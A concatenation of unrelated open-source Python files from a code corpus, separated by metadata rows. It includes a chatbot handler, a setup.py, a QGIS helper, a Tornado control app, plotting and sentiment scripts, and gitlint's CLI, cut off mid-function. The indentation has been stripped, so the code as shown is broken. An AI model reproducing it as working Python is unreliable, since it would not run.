user=ctx['user'])
@story.on([
text.Match('more about(.+)', flags=re.IGNORECASE),
text.Match('see(.+)', flags=re.IGNORECASE),
])
def task_details_story_by_text_match():
@story.part()
async def send_task_details(ctx):
query = story_context.get_message_data(ctx, 'text', 'matches')[0].strip()
try:
task = await tasks_document.TaskDocument.objects.find({
'description': query,
})
if len(task) == 1:
await task_details_renderer.render(story, ctx['user'], task[0])
else:
pass
# TODO:
except orm.errors.DoesNotExist:
# TODO:
pass
@story.on(option.Match('TASK_DETAILS_(.+)'))
def task_details_story_by_option_match():
@story.part()
async def send_task_details_back(ctx):
task_id = story_context.get_message_data(ctx, 'option', 'matches')[0]
try:
task = await tasks_document.TaskDocument.objects.find_one({
'_id': ObjectId(task_id),
})
await task_details_renderer.render(story, ctx['user'], task)
except orm.errors.DoesNotExist:
await story.ask(emoji.emojize(
':confused: Can\'t find task details.',
use_aliases=True),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
}],
user=ctx['user'])
@story.on([
option.Equal('LAST_TASK_DETAILS'),
text.Match('last(?: task)?', flags=re.IGNORECASE),
text.Match('next (details|task)', flags=re.IGNORECASE),
text.Match('^(task )?details', flags=re.IGNORECASE),
])
def last_task_story():
@story.part()
async def send_last_task_details(ctx):
try:
await task_details_renderer.render(story, ctx['user'],
task=await task_story_helper.last_task(ctx))
except orm.errors.DoesNotExist:
await story.ask('There is no last task yet. Please add few.',
user=ctx['user'],
quick_replies=[{
'title': 'Add New Task',
'payload': 'ADD_NEW_TASK'
}])
@story.on([
option.Equal('ABOUT_ME'),
text.Equal('?'),
text.Equal('/?'),
text.EqualCaseIgnore('-h'),
text.EqualCaseIgnore('--help'),
text.Match('help( me)?', flags=re.IGNORECASE),
text.EqualCaseIgnore('what can I do here?'),
])
def about_me_story():
@story.part()
async def say_about_me(ctx):
await story.ask(SHORT_HELP_EMOJI,
user=ctx['user'],
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
}])
@story.on(receive=sticker.Like())
def like_story():
@story.part()
async def test_message(ctx):
msgs = [':wink:', ':heart_eyes:', ':smirk:', ':wink:', 'Thanks!', 'I like you too!']
await story.ask(emoji.emojize(random.choice(msgs), use_aliases=True),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
}],
user=ctx['user'])
task_creation_stories.setup(story)
@story.on(receive=any.Any())
def any_story():
"""
And all the rest messages as well
"""
@story.part()
async def something_else(message):
logger.info('something_else')
await story.ask(
emoji.emojize(':confused: Sorry I don\'t know, how to react on such message yet.\n'
'Here are few things that you can do quickly',
use_aliases=True),
quick_replies=[{
'title': 'add new task',
'payload': 'ADD_NEW_TASK',
}, {
'title': 'list tasks',
'payload': 'LIST_TASKS_NEW_FIRST',
}],
user=message['user'])
| mit | 8,795,261,198,113,121,000 | 41.24605 | 119 | 0.455196 | false | 4.503128 | false | false | false |
beni55/django-multiselectfield | setup.py | 2 | 1717 | # -*- coding: utf-8 -*-
# Copyright (c) 2012-2013 by Pablo Martín <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this programe. If not, see <http://www.gnu.org/licenses/>.
# Initial code got from http://djangosnippets.org/users/danielroseman/
import os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
setup(
name="django-multiselectfield",
version="0.1.2",
author="Pablo Martin",
author_email="[email protected]",
description="Django multiple select field",
long_description=(read('README.rst') + '\n\n' + read('CHANGES.rst')),
classifiers=[
'Development Status :: 4 - Beta',
'Framework :: Django',
'License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
license="LGPL 3",
keywords="django,multiple,select,field,choices",
url='https://github.com/goinnn/django-multiselectfield',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
)
| lgpl-3.0 | -8,189,555,984,192,985,000 | 36.304348 | 89 | 0.69697 | false | 3.763158 | false | false | false |
Gustry/GeoHealth | src/core/blurring/layer_index.py | 1 | 2584 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
GeoHealth
A QGIS plugin
-------------------
begin : 2014-08-20
copyright : (C) 2014 by Etienne Trimaille
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from builtins import object
from qgis.core import QgsSpatialIndex, QgsFeatureRequest, QgsGeometry, Qgis
class LayerIndex(object):
"""Check an intersection between a QgsGeometry and a QgsVectorLayer."""
def __init__(self, layer):
self.__layer = layer
if Qgis.QGIS_VERSION_INT >= 20700:
self.__index = QgsSpatialIndex(layer.getFeatures())
else:
self.__index = QgsSpatialIndex()
for ft in layer.getFeatures():
self.__index.insertFeature(ft)
def contains(self, point):
"""Return true if the point intersects the layer."""
intersects = self.__index.intersects(point.boundingBox())
for i in intersects:
request = QgsFeatureRequest().setFilterFid(i)
feat = next(self.__layer.getFeatures(request))
if point.intersects(QgsGeometry(feat.geometry())):
return True
return False
def count_intersection(self, buffer_geom, nb):
"""Return true if the buffer intersects enough entities."""
count = 0
intersects = self.__index.intersects(buffer_geom.boundingBox())
for i in intersects:
request = QgsFeatureRequest().setFilterFid(i)
feat = next(self.__layer.getFeatures(request))
if buffer_geom.intersects(QgsGeometry(feat.geometry())):
count += 1
if count >= nb:
return True
return False
| gpl-3.0 | -7,222,612,915,611,914,000 | 40.015873 | 77 | 0.458204 | false | 5.394572 | false | false | false |
thomaserlang/firing-system | web.py | 1 | 5483 | import logging
import tornado.ioloop
import tornado.web
import tornado.options
import tornado.websocket
import math
import os
import json
import constants
from decorators import new_cursor
class Web_handler(tornado.web.RequestHandler):
def get(self):
self.render(
'ports.html',
GROUPED_PORTS=constants.GROUPED_PORTS,
CONNECTIONS_PER_PORT=constants.CONNECTIONS_PER_PORT,
PORT_COLORS=constants.PORT_COLORS,
groups=self.groups(),
selected_group=self.selected_group(),
ports=json.dumps(self.ports()),
)
def ports(self):
group_id = self.get_argument('group_id', None)
if not group_id:
return []
with new_cursor() as c:
rows = c.execute(
'SELECT * FROM ports WHERE group_id=?',
(group_id,)
).fetchall()
data = []
for row in rows:
data.append({
'port': row['port'],
'connection': row['connection'],
'enabled': True if row['enabled'] == 'Y' else False,
'delay': row['delay'],
})
return data
def selected_group(self):
group_id = self.get_argument('group_id', None)
if not group_id:
return
return self.group_by_id(group_id)
def group_by_id(self, group_id):
with new_cursor() as c:
return c.execute(
'SELECT * FROM groups WHERE id=?',
(group_id,)
).fetchone()
def parse_delay(self, delay):
if not delay:
return 0
try:
return int(delay)
except ValueError:
return 0
def post(self):
name = self.get_argument('groupname')
if not name:
self.redirect('/')
return
with new_cursor() as c:
group = c.execute(
'SELECT * FROM groups WHERE name=?;', (name,)
).fetchone()
if group:
group_id = group['id']
else:
c.execute('INSERT INTO groups (name) VALUES (?);', (name,))
group_id = c.lastrowid
data = json.loads(self.get_argument('json'))
pdata = []
for d in data:
pdata.append(
(
group_id,
d['port'],
d['connection'],
'Y' if d['enabled'] else 'N',
self.parse_delay(d['delay']),
)
)
c.execute('DELETE FROM ports WHERE group_id=?;', (group_id,))
c.executemany(
'''
INSERT INTO ports
(group_id, port, connection, enabled, delay)
VALUES
(?, ?, ?, ?, ?)
''',
pdata
)
self.redirect('/?group_id={}'.format(group_id))
return
def groups(self):
with new_cursor() as c:
return c.execute(
'SELECT * FROM groups ORDER BY name ASC;'
).fetchall();
class Firing_progress_handler(tornado.websocket.WebSocketHandler):
clients = []
@classmethod
def send_message(cls, message):
for c in cls.clients:
c.write_message(message)
def open(self):
Firing_progress_handler.clients.append(self)
def on_message(self, message):
pass
def on_close(self):
Firing_progress_handler.clients.remove(self)
class Fire_handler(tornado.web.RequestHandler):
t = None
def get(self):
pass
def post(self):
import threading
import fire
cancel = self.get_argument('cancel', None)
if cancel:
fire.stop = True
return
if Fire_handler.t:
if Fire_handler.t.isAlive():
return
Fire_handler.t = threading.Thread(
target=fire.fire,
args=(self.get_argument('group_id')),
)
fire.stop = False
Fire_handler.t.daemon = True
Fire_handler.t.start()
def main():
con = init_db(constants.DATABASE_FILE)
application = tornado.web.Application(
[
(r'/', Web_handler),
(r'/firing-progress', Firing_progress_handler),
(r'/fire', Fire_handler),
],
debug=True,
xsrf_cookies=False,
autoescape=None,
template_path=os.path.join(os.path.dirname(__file__), 'templates'),
static_path=os.path.join(os.path.dirname(__file__), 'static'),
)
application.listen(8000)
tornado.options.parse_command_line()
tornado.ioloop.IOLoop.instance().start()
def init_db(db_file):
with new_cursor() as c:
c.execute('''
CREATE TABLE IF NOT EXISTS groups (
id INTEGER PRIMARY KEY,
name TEXT
);
''')
c.execute('''
CREATE TABLE IF NOT EXISTS ports (
group_id INT NOT NULL,
port INT NOT NULL,
connection INT NOT NULL,
enabled TEXT,
delay INT DEFAULT 0,
PRIMARY KEY (group_id, port, connection)
);
''')
if __name__ == '__main__':
main() | mit | -4,520,526,623,585,199,600 | 27.712042 | 75 | 0.484406 | false | 4.457724 | false | false | false |
neuro-lyon/multiglom-model | src/script_fig_netw_freq.py | 1 | 3172 | # -*- coding:utf-8 -*-
"""
Script to see if the model is like the model of [1]_ by plotting the network
frequency against the oscillation rate.
References
----------
.. [1] Fourcaud-Trocmé, N., Courtiol, E., Buonviso, N., & Voegtlin, T. (2011).
Stability of fast oscillations in the mammalian olfactory bulb: experiments
and modeling. Journal of physiology, Paris, 105(1-3), 59–70.
doi:10.1016/j.jphysparis.2011.07.009
"""
import tables
import numpy as np
import matplotlib.pyplot as plt
from h5manager import get_all_attrs
def plot_netw_freq(db_filename, point_color, label):
"""Plot g_Ein0 against FFTMAX for the given DB."""
db = tables.openFile(db_filename) # Open the HDF5 database-like
# Get the interesting values
attrs_list = (('paramset', '_v_attrs', 'Input', 'g_Ein0'),
('results', '_v_attrs', 'FFTMAX', 0))
attrs = np.array(get_all_attrs(db, attrs_list))
# Put them on the figure
plt.plot(attrs[:, 0], attrs[:, 1], ' .', color=point_color, label=label)
plt.legend(loc="upper left")
# Finally, close the db
db.close()
def plot_freqs(db_filename, point_color, label):
"""Plot mitral firing rate against network frequency."""
db = tables.openFile(db_filename)
# Get the values and arrays
attrs_list = (('results', 'spikes_it'),
('results', '_v_attrs', 'FFTMAX', 0),
('paramset', '_v_attrs', 'Common'))
attrs = get_all_attrs(db, attrs_list)
ps_common = attrs[0][2]
n_mitral = ps_common['N_mitral']
simu_length = ps_common['simu_length']
burnin = ps_common['burnin']
# Compute the spiking rate for each simulation
sim_values = np.ndarray((len(attrs), 2))
for ind_simu, simu in enumerate(attrs):
spike_times = simu[0].read()[1]
sim_values[ind_simu][0] = get_spiking_rate(spike_times, n_mitral,
simu_length, burnin)
sim_values[ind_simu][1] = simu[1] # FFTMAX already computed
# Plot the values
plt.plot(sim_values[:, 0], sim_values[:, 1], ' .', color=point_color,
label=label)
plt.legend()
# Close the DB
db.close()
def get_spiking_rate(spike_times, n_mitral, simu_length, burnin):
"""Return the spiking rate for the whole population."""
time_mask = (spike_times > burnin)
return 1.*time_mask.sum()/(n_mitral*(simu_length - burnin))
def main():
# Get the data
filename_beta = "data/db40_beta_1pop_fig_netw_freq_multiproc.h5"
filename_gamma = "data/db40_gamma_1pop_fig_netw_freq.h5"
# Build network frequency figure
plt.figure()
plot_netw_freq(filename_beta, 'blue', "beta")
plot_netw_freq(filename_gamma, 'red', "gamma")
plt.xlabel("Input excitatory conductance $g_{Ein0}$ (S $m^{-2}$)")
plt.ylabel("Network frequency $f$ (Hz)")
# Build freq vs. freq figure
plt.figure()
plot_freqs(filename_beta, 'blue', "beta")
plot_freqs(filename_gamma, 'red', "gamma")
plt.xlabel("Mitral firing rate $\\nu_0$")
plt.ylabel("Network frequency $f$ (Hz)")
plt.show()
if __name__ == '__main__':
res = main()
| mit | 6,029,708,695,739,347,000 | 30.376238 | 78 | 0.613758 | false | 3.116028 | false | false | false |
sazlin/reTOracle | SA_Mapper.py | 1 | 3038 | #!/usr/bin/python
"""
Note: You can test SA_Mapper.py and sa_reducer.py by themselves
using the following line in the console:
cat sa_input | python SA_Mapper.py | sort | python sa_reducer.py
sa_input is an example input file created for S3 by SQ_Worker.py
"""
import json
import time
import sys
#from sentimentML.ML_builder import ML_builder
#from datum_box import box_tweet
from SentimentAnalysis import NB, LR
from sentimentML import ML_builder
# DBox = None
# Datum_Integers = {'positive': 1, 'neutral': 0, 'negative': -1}
SVM = None
def _setup_SVM():
global SVM
SVM = ML_builder.SVM_builder()
SVM.SVM_build()
def _setup_DatumBox():
pass
# global DBox
# Datum_api_key = os.getenv('DATUM')
# DBox = DatumBox(Datum_api_key)
def setup_SA():
_setup_SVM()
_setup_DatumBox()
def run_SA(tweet, ret_dict=None):
if not ret_dict:
ret_dict = {}
ret_dict = {'tweet_id': tweet[0]}
_run_LR_SA(tweet, ret_dict)
_run_NB_SA(tweet, ret_dict)
_run_SVM_SA(tweet, ret_dict)
_run_DatumBox(tweet, ret_dict)
return ret_dict
def _run_LR_SA(tweet, ret_dict):
t1 = time.time()
results, probs = LR.predict(tweet[1])
t2 = time.time()
ret_dict['LR_SENT'] = results
ret_dict['LR_NEG_PROB'] = probs[0]
ret_dict['LR_POS_PROB'] = probs[1]
ret_dict['LR_EXEC_TIME'] = t2 - t1
#do magic
return ret_dict
def _run_NB_SA(tweet, ret_dict):
t1 = time.time()
results, probs = NB.predict(tweet[1])
t2 = time.time()
ret_dict['NB_SENT'] = results
ret_dict['NB_NEG_PROB'] = probs[0]
ret_dict['NB_POS_PROB'] = probs[1]
ret_dict['NB_EXEC_TIME'] = t2 - t1
#do magic
return ret_dict
def _run_SVM_SA(tweet, ret_dict):
t1 = time.time()
result = SVM.Predict(tweet[1])
t2 = time.time()
ret_dict['SVM_SENT'] = result[0]
ret_dict['SVM_NEG_PROB'] = result[1][0]
ret_dict['SVM_POS_PROB'] = result[1][1]
ret_dict['SVM_EXEC_TIME'] = t2 - t1
# ret_dict['SVM_SENT'] = 1
# ret_dict['SVM_NEG_PROB'] = 0.3
# ret_dict['SVM_POS_PROB'] = 0.89
# ret_dict['SVM_EXEC_TIME'] = 0.424
#do magic
return ret_dict
def _run_DatumBox(tweet, ret_dict):
# t1 = time.time()
# result = box_tweet(tweet[1])
# t2 = time.time()
# ret_dict['DatumBox_SENT'] = result
# ret_dict['DatumBox_NEG_PROB'] = -1
# ret_dict['DatumBox_POS_PROB'] = -1
# ret_dict['DatumBox_EXEC_TIME'] = t2 - t1
ret_dict['DatumBox_SENT'] = -2
ret_dict['DatumBox_NEG_PROB'] = -1
ret_dict['DatumBox_POS_PROB'] = -1
ret_dict['DatumBox_EXEC_TIME'] = -1
#do magic
return ret_dict
def main(argv):
setup_SA()
for line in sys.stdin:
try:
tweet = json.loads(line)
except Exception:
pass # skip this tweet
else:
#do SA magics
delicious_payload = json.dumps(run_SA(tweet))
print delicious_payload.lower()
#print str(tweet[0]) + '\t' + '1'
if __name__ == "__main__":
main(sys.argv)
| mit | 7,318,810,689,478,479,000 | 23.5 | 64 | 0.591178 | false | 2.826047 | false | false | false |
venthur/pyff | src/lib/vision_egg/util/frame_counter.py | 3 | 1500 | __copyright__ = """ Copyright (c) 2010-2011 Torsten Schmits
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
"""
import logging
import threading
import pygame
class FrameCounter(threading.Thread):
""" Runs a thread that calls flip() repeatedly, which waits for
vsync and thus indicates real display redraws. """
def __init__(self, flag):
threading.Thread.__init__(self)
self._flag = flag
self.frame = 0
self._locked_frame = 0
def run(self):
try:
while self._flag:
self.step()
except pygame.error as e:
logging.getLogger('FrameCounter').error(unicode(e))
def step(self):
self.sync()
self.frame += 1
def sync(self):
pygame.display.flip()
def lock(self):
self._locked_frame = self.frame
@property
def last_interval(self):
return self.frame - self._locked_frame
| gpl-2.0 | 8,166,437,170,635,239,000 | 29 | 71 | 0.67 | false | 4.237288 | false | false | false |
jorisroovers/gitlint | gitlint/cli.py | 1 | 19134 | # pylint: disable=bad-option-value,wrong-import-position
# We need to disable the import position checks because of the windows check that we need to do below
import copy
import logging
import os
import platform
import stat
import sys
import click
import gitlint
from gitlint.lint import GitLinter
from gitlint.config import LintConfigBuilder, LintConfigError, LintConfigGenerator
from gitlint.git import GitContext, GitContextError, git_version
from gitlint import hooks
from gitlint.shell import shell
from gitlint.utils import LOG_FORMAT
from gitlint.exception import GitlintError
# Error codes
MAX_VIOLATION_ERROR_CODE = 252
USAGE_ERROR_CODE = 253
GIT_CONTEXT_ERROR_CODE = 254
CONFIG_ERROR_CODE = 255
DEFAULT_CONFIG_FILE = ".gitlint"
# -n: disable swap files. This fixes a vim error on windows (E303: Unable to open swap file for <path>)
DEFAULT_COMMIT_MSG_EDITOR = "vim -n"
# Since we use the return code to denote the amount of errors, we need to change the default click usage error code
click.UsageError.exit_code = USAGE_ERROR_CODE
# We don't use logging.getLogger(__main__) here because that will cause DEBUG output to be lost
# when invoking gitlint as a python module (python -m gitlint.cli)
LOG = logging.getLogger("gitlint.cli")
class GitLintUsageError(GitlintError):
""" Exception indicating there is an issue with how gitlint is used. """
pass
def setup_logging():
""" Setup gitlint logging """
root_log = logging.getLogger("gitlint")
root_log.propagate = False # Don't propagate to child loggers, the gitlint root logger handles everything
handler = logging.StreamHandler()
formatter = logging.Formatter(LOG_FORMAT)
handler.setFormatter(formatter)
root_log.addHandler(handler)
root_log.setLevel(logging.ERROR)
def log_system_info():
LOG.debug("Platform: %s", platform.platform())
LOG.debug("Python version: %s", sys.version)
LOG.debug("Git version: %s", git_version())
LOG.debug("Gitlint version: %s", gitlint.__version__)
LOG.debug("GITLINT_USE_SH_LIB: %s", os.environ.get("GITLINT_USE_SH_LIB", "[NOT SET]"))
LOG.debug("DEFAULT_ENCODING: %s", gitlint.utils.DEFAULT_ENCODING)
def build_config( # pylint: disable=too-many-arguments
target, config_path, c, extra_path, ignore, contrib, ignore_stdin, staged, verbose, silent, debug
):
""" Creates a LintConfig object based on a set of commandline parameters. """
config_builder = LintConfigBuilder()
# Config precedence:
# First, load default config or config from configfile
if config_path:
config_builder.set_from_config_file(config_path)
elif os.path.exists(DEFAULT_CONFIG_FILE):
config_builder.set_from_config_file(DEFAULT_CONFIG_FILE)
# Then process any commandline configuration flags
config_builder.set_config_from_string_list(c)
# Finally, overwrite with any convenience commandline flags
if ignore:
config_builder.set_option('general', 'ignore', ignore)
if contrib:
config_builder.set_option('general', 'contrib', contrib)
if ignore_stdin:
config_builder.set_option('general', 'ignore-stdin', ignore_stdin)
if silent:
config_builder.set_option('general', 'verbosity', 0)
elif verbose > 0:
config_builder.set_option('general', 'verbosity', verbose)
if extra_path:
config_builder.set_option('general', 'extra-path', extra_path)
if target:
config_builder.set_option('general', 'target', target)
if debug:
config_builder.set_option('general', 'debug', debug)
if staged:
config_builder.set_option('general', 'staged', staged)
config = config_builder.build()
return config, config_builder
def get_stdin_data():
""" Helper function that returns data send to stdin or False if nothing is send """
# STDIN can only be 3 different types of things ("modes")
# 1. An interactive terminal device (i.e. a TTY -> sys.stdin.isatty() or stat.S_ISCHR)
# 2. A (named) pipe (stat.S_ISFIFO)
# 3. A regular file (stat.S_ISREG)
# Technically, STDIN can also be other device type like a named unix socket (stat.S_ISSOCK), but we don't
# support that in gitlint (at least not today).
#
# Now, the behavior that we want is the following:
# If someone sends something directly to gitlint via a pipe or a regular file, read it. If not, read from the
# local repository.
# Note that we don't care about whether STDIN is a TTY or not, we only care whether data is via a pipe or regular
# file.
# However, in case STDIN is not a TTY, it HAS to be one of the 2 other things (pipe or regular file), even if
# no-one is actually sending anything to gitlint over them. In this case, we still want to read from the local
# repository.
# To support this use-case (which is common in CI runners such as Jenkins and Gitlab), we need to actually attempt
# to read from STDIN in case it's a pipe or regular file. In case that fails, then we'll fall back to reading
# from the local repo.
mode = os.fstat(sys.stdin.fileno()).st_mode
stdin_is_pipe_or_file = stat.S_ISFIFO(mode) or stat.S_ISREG(mode)
if stdin_is_pipe_or_file:
input_data = sys.stdin.read()
# Only return the input data if there's actually something passed
# i.e. don't consider empty piped data
if input_data:
return str(input_data)
return False
def build_git_context(lint_config, msg_filename, refspec):
""" Builds a git context based on passed parameters and order of precedence """
# Determine which GitContext method to use if a custom message is passed
from_commit_msg = GitContext.from_commit_msg
if lint_config.staged:
LOG.debug("Fetching additional meta-data from staged commit")
from_commit_msg = lambda message: GitContext.from_staged_commit(message, lint_config.target) # noqa
# Order of precedence:
# 1. Any data specified via --msg-filename
if msg_filename:
LOG.debug("Using --msg-filename.")
return from_commit_msg(str(msg_filename.read()))
# 2. Any data sent to stdin (unless stdin is being ignored)
if not lint_config.ignore_stdin:
stdin_input = get_stdin_data()
if stdin_input:
LOG.debug("Stdin data: '%s'", stdin_input)
LOG.debug("Stdin detected and not ignored. Using as input.")
return from_commit_msg(stdin_input)
if lint_config.staged:
raise GitLintUsageError("The 'staged' option (--staged) can only be used when using '--msg-filename' or "
"when piping data to gitlint via stdin.")
# 3. Fallback to reading from local repository
LOG.debug("No --msg-filename flag, no or empty data passed to stdin. Using the local repo.")
return GitContext.from_local_repository(lint_config.target, refspec)
def handle_gitlint_error(ctx, exc):
""" Helper function to handle exceptions """
if isinstance(exc, GitContextError):
click.echo(exc)
ctx.exit(GIT_CONTEXT_ERROR_CODE)
elif isinstance(exc, GitLintUsageError):
click.echo(f"Error: {exc}")
ctx.exit(USAGE_ERROR_CODE)
elif isinstance(exc, LintConfigError):
click.echo(f"Config Error: {exc}")
ctx.exit(CONFIG_ERROR_CODE)
class ContextObj:
""" Simple class to hold data that is passed between Click commands via the Click context. """
def __init__(self, config, config_builder, refspec, msg_filename, gitcontext=None):
self.config = config
self.config_builder = config_builder
self.refspec = refspec
self.msg_filename = msg_filename
self.gitcontext = gitcontext
@click.group(invoke_without_command=True, context_settings={'max_content_width': 120},
epilog="When no COMMAND is specified, gitlint defaults to 'gitlint lint'.")
@click.option('--target', envvar='GITLINT_TARGET',
type=click.Path(exists=True, resolve_path=True, file_okay=False, readable=True),
help="Path of the target git repository. [default: current working directory]")
@click.option('-C', '--config', type=click.Path(exists=True, dir_okay=False, readable=True, resolve_path=True),
help=f"Config file location [default: {DEFAULT_CONFIG_FILE}]")
@click.option('-c', multiple=True,
help="Config flags in format <rule>.<option>=<value> (e.g.: -c T1.line-length=80). " +
"Flag can be used multiple times to set multiple config values.") # pylint: disable=bad-continuation
@click.option('--commits', envvar='GITLINT_COMMITS', default=None, help="The range of commits to lint. [default: HEAD]")
@click.option('-e', '--extra-path', envvar='GITLINT_EXTRA_PATH',
help="Path to a directory or python module with extra user-defined rules",
type=click.Path(exists=True, resolve_path=True, readable=True))
@click.option('--ignore', envvar='GITLINT_IGNORE', default="", help="Ignore rules (comma-separated by id or name).")
@click.option('--contrib', envvar='GITLINT_CONTRIB', default="",
help="Contrib rules to enable (comma-separated by id or name).")
@click.option('--msg-filename', type=click.File(), help="Path to a file containing a commit-msg.")
@click.option('--ignore-stdin', envvar='GITLINT_IGNORE_STDIN', is_flag=True,
help="Ignore any stdin data. Useful for running in CI server.")
@click.option('--staged', envvar='GITLINT_STAGED', is_flag=True,
help="Read staged commit meta-info from the local repository.")
@click.option('-v', '--verbose', envvar='GITLINT_VERBOSITY', count=True, default=0,
help="Verbosity, more v's for more verbose output (e.g.: -v, -vv, -vvv). [default: -vvv]", )
@click.option('-s', '--silent', envvar='GITLINT_SILENT', is_flag=True,
help="Silent mode (no output). Takes precedence over -v, -vv, -vvv.")
@click.option('-d', '--debug', envvar='GITLINT_DEBUG', help="Enable debugging output.", is_flag=True)
@click.version_option(version=gitlint.__version__)
@click.pass_context
def cli( # pylint: disable=too-many-arguments
ctx, target, config, c, commits, extra_path, ignore, contrib,
msg_filename, ignore_stdin, staged, verbose, silent, debug,
):
""" Git lint tool, checks your git commit messages for styling issues
Documentation: http://jorisroovers.github.io/gitlint
"""
try:
if debug:
logging.getLogger("gitlint").setLevel(logging.DEBUG)
LOG.debug("To report issues, please visit https://github.com/jorisroovers/gitlint/issues")
log_system_info()
# Get the lint config from the commandline parameters and
# store it in the context (click allows storing an arbitrary object in ctx.obj).
config, config_builder = build_config(target, config, c, extra_path, ignore, contrib,
ignore_stdin, staged, verbose, silent, debug)
LOG.debug("Configuration\n%s", config)
ctx.obj = ContextObj(config, config_builder, commits, msg_filename)
# If no subcommand is specified, then just lint
if ctx.invoked_subcommand is None:
ctx.invoke(lint)
except GitlintError as e:
handle_gitlint_error(ctx, e)
@cli.command("lint")
@click.pass_context
def lint(ctx):
""" Lints a git repository [default command] """
lint_config = ctx.obj.config
refspec = ctx.obj.refspec
msg_filename = ctx.obj.msg_filename
gitcontext = build_git_context(lint_config, msg_filename, refspec)
# Set gitcontext in the click context, so we can use it in command that are ran after this
# in particular, this is used by run-hook
ctx.obj.gitcontext = gitcontext
number_of_commits = len(gitcontext.commits)
# Exit if we don't have commits in the specified range. Use a 0 exit code, since a popular use-case is one
# where users are using --commits in a check job to check the commit messages inside a CI job. By returning 0, we
# ensure that these jobs don't fail if for whatever reason the specified commit range is empty.
if number_of_commits == 0:
LOG.debug(u'No commits in range "%s"', refspec)
ctx.exit(0)
LOG.debug(u'Linting %d commit(s)', number_of_commits)
general_config_builder = ctx.obj.config_builder
last_commit = gitcontext.commits[-1]
# Let's get linting!
first_violation = True
exit_code = 0
for commit in gitcontext.commits:
# Build a config_builder taking into account the commit specific config (if any)
config_builder = general_config_builder.clone()
config_builder.set_config_from_commit(commit)
# Create a deepcopy from the original config, so we have a unique config object per commit
# This is important for configuration rules to be able to modifying the config on a per commit basis
commit_config = config_builder.build(copy.deepcopy(lint_config))
# Actually do the linting
linter = GitLinter(commit_config)
violations = linter.lint(commit)
# exit code equals the total number of violations in all commits
exit_code += len(violations)
if violations:
# Display the commit hash & new lines intelligently
if number_of_commits > 1 and commit.sha:
linter.display.e("{0}Commit {1}:".format(
"\n" if not first_violation or commit is last_commit else "",
commit.sha[:10]
))
linter.print_violations(violations)
first_violation = False
# cap actual max exit code because bash doesn't like exit codes larger than 255:
# http://tldp.org/LDP/abs/html/exitcodes.html
exit_code = min(MAX_VIOLATION_ERROR_CODE, exit_code)
LOG.debug("Exit Code = %s", exit_code)
ctx.exit(exit_code)
@cli.command("install-hook")
@click.pass_context
def install_hook(ctx):
""" Install gitlint as a git commit-msg hook. """
try:
hooks.GitHookInstaller.install_commit_msg_hook(ctx.obj.config)
hook_path = hooks.GitHookInstaller.commit_msg_hook_path(ctx.obj.config)
click.echo(f"Successfully installed gitlint commit-msg hook in {hook_path}")
ctx.exit(0)
except hooks.GitHookInstallerError as e:
click.echo(e, err=True)
ctx.exit(GIT_CONTEXT_ERROR_CODE)
@cli.command("uninstall-hook")
@click.pass_context
def uninstall_hook(ctx):
""" Uninstall gitlint commit-msg hook. """
try:
hooks.GitHookInstaller.uninstall_commit_msg_hook(ctx.obj.config)
hook_path = hooks.GitHookInstaller.commit_msg_hook_path(ctx.obj.config)
click.echo(f"Successfully uninstalled gitlint commit-msg hook from {hook_path}")
ctx.exit(0)
except hooks.GitHookInstallerError as e:
click.echo(e, err=True)
ctx.exit(GIT_CONTEXT_ERROR_CODE)
@cli.command("run-hook")
@click.pass_context
def run_hook(ctx):
""" Runs the gitlint commit-msg hook. """
exit_code = 1
while exit_code > 0:
try:
click.echo("gitlint: checking commit message...")
ctx.invoke(lint)
except GitlintError as e:
handle_gitlint_error(ctx, e)
except click.exceptions.Exit as e:
# Flush stderr andstdout, this resolves an issue with output ordering in Cygwin
sys.stderr.flush()
sys.stdout.flush()
exit_code = e.exit_code
if exit_code == 0:
click.echo("gitlint: " + click.style("OK", fg='green') + " (no violations in commit message)")
continue
click.echo("-----------------------------------------------")
click.echo("gitlint: " + click.style("Your commit message contains violations.", fg='red'))
value = None
while value not in ["y", "n", "e"]:
click.echo("Continue with commit anyways (this keeps the current commit message)? "
"[y(es)/n(no)/e(dit)] ", nl=False)
# Ideally, we'd want to use click.getchar() or click.prompt() to get user's input here instead of
# input(). However, those functions currently don't support getting answers from stdin.
# This wouldn't be a huge issue since this is unlikely to occur in the real world,
# were it not that we use a stdin to pipe answers into gitlint in our integration tests.
# If that ever changes, we can revisit this.
# Related click pointers:
# - https://github.com/pallets/click/issues/1370
# - https://github.com/pallets/click/pull/1372
# - From https://click.palletsprojects.com/en/7.x/utils/#getting-characters-from-terminal
# Note that this function will always read from the terminal, even if stdin is instead a pipe.
value = input()
if value == "y":
LOG.debug("run-hook: commit message accepted")
exit_code = 0
elif value == "e":
LOG.debug("run-hook: editing commit message")
msg_filename = ctx.obj.msg_filename
if msg_filename:
msg_filename.seek(0)
